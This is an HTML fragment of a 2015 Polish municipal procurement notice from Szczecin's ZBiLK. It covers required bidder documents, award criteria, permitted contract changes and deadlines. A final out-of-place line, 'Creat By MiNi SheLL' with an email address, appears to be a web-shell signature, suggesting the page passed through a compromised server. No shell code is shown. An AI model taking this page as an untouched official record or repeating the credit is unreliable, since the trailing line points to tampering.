<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; 
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, 
że wykonawca na 2 dni  przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdej z branż oddzielnie, dla każdego lokalu mieszkalnego, sporządzone zgodnie z postanowieniami Rozdziału X siwz.
W przypadku składania oferty wspólnej należy złożyć jeden dokument 
5)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych.
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Okres gwarancji - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	W związku z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie:
1)	terminu wykonania zamówienia w przypadku wystąpienia okoliczności, nieprzewidzianych i niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy,
2)	osób przewidzianych do realizacji umowy po stronie Wykonawcy (ujętych w wykazie zawartym w ofercie), pod warunkiem, że nowe osoby będą posiadały kwalifikacje zgodne z wymogiem opisanym w siwz. Zmiana taka będzie dopuszczalna w przypadku choroby, wypadku, śmierci lub w sytuacji, gdy osoba przewidziana do realizacji umowy, nie wywiązuje się należycie ze swoich obowiązków lub z innej niezależnej od Wykonawcy przyczyny. Zmiana osób wymaga zgody Zamawiającego, pod rygorem odstąpienia od umowy lub zapłaty kary umownej wskazanej w § 12 ust. 1 pkt 5 umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych ul. Mariacka 25, pok. nr 9, 70-546 Szczecin po okazaniu dowodu wpłaty na kwotę 50 zł na konto 91 1020 4795 0000 9202 0292 7580.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2015 godzina 09:00, miejsce: Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25, pok. nr 9,
70 - 546 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 24 ust. 2a ustawy Prawo zamówień publicznych Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli Zamawiający przewidział taką możliwość wykluczenia Wykonawcy w ogłoszeniu o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com